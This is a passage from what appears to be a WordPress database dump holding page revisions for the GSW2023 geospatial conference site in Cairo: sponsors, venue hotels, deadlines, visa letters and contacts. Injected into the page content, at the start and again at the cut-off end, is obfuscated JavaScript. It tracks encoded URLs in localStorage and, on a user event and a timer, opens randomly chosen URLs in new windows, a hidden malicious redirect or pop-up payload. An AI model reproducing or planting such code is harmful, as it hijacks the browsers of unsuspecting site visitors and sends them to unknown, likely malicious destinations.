_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-18 13:53:55','2023-06-18 13:53:55','',3066,'https://gsw2023.com/?p=4715',0,'revision','',0),
(4716,1,'2023-06-18 13:54:24','2023-06-18 13:54:24','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686739986286{margin-top: -35px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096393493{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1687094969343{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let 